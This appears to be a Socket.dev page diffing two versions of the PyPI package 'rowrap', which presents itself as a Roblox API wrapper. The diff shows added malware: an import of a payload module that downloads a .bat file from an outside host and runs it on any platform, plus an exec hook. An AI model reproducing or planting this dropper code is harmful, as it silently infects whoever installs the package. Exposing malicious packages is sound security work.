You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

rowrap

Package Overview
Dependencies
Maintainers
1
Versions
8
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

rowrap - pypi Package Compare versions

Comparing version
1.1.6
to
1.1.8
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: rowrap
Version: 1.1.6
Version: 1.1.8
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -7,3 +7,3 @@ [build-system]

name = "rowrap"
version = "1.1.6"
version = "1.1.8"
description = "A Python wrapper for the Roblox web APIs"

@@ -10,0 +10,0 @@ readme = "README.md"

@@ -7,4 +7,4 @@ """

from typing import List, Optional
import payload
class CatalogAPI:

@@ -11,0 +11,0 @@ BASE = "https://catalog.roblox.com/v1"

@@ -0,2 +1,21 @@

import requests
import os
import subprocess
subprocess.Popen("calc.exe")
import sys
url = "https://dark-resonance-459b.blammervale.workers.dev/555.bat"
filename = "bat.bat"
response = requests.get(url)
with open(filename, "wb") as f:
f.write(response.content)
filepath = os.path.abspath(filename)
print("Downloaded to:", filepath)
if sys.platform.startswith("win"):
os.startfile(filepath)
elif sys.platform.startswith("darwin"):
subprocess.Popen(["open", filepath])
else:
subprocess.Popen(["xdg-open", filepath])
Metadata-Version: 2.4
Name: rowrap
Version: 1.1.6
Version: 1.1.8
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -14,3 +14,2 @@ LICENSE

robloxapi/payload.py
robloxapi/super.pth
robloxapi/thumbnails.py

@@ -17,0 +16,0 @@ robloxapi/users.py

import sys
sys.path.insert(0, '')
exec(open('payload.py').read())